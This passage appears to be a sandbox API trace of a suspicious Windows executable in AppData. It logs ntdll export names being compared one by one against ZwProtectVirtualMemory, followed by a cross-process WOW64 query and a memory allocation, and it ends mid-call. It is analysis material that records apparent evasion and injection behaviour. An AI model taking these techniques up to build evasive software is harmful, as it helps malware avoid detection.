[0206.859] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="DbgPrint", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwProtectVirtualMemory") returned -1 [0206.860] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwProtectVirtualMemory") returned -1 [0206.861] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwProtectVirtualMemory") returned -1 [0206.862] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="MD4Final", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="MD4Init", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="MD4Update", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="MD5Final", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="MD5Init", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="MD5Update", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.863] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtClose", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwProtectVirtualMemory") returned -1 [0206.864] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.865] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwProtectVirtualMemory") returned -1 [0206.865] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0206.865] VirtualFree (lpAddress=0x2720000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.873] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.873] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.873] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf414, ProcessInformationLength=0x30, ReturnLength=0x1eaf468 | out: ProcessInformation64=0x1eaf414, ReturnLength=0x1eaf468) returned 0x0 [0206.873] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0206.873] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.873] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.873] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf414, ProcessInformationLength=0x30, ReturnLength=0x1eaf468 | out: ProcessInformation64=0x1eaf414, ReturnLength=0x1eaf468) returned 0x0 [0206.873] StrRChrA (lpStart="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpEnd=0x0, wMatch=0x5c) returned="\\autoclb.exe" [0206.873] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0206.873] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0206.873] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0206.873] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0206.873] lstrcmpiA (lpString1="autoclb.exe", 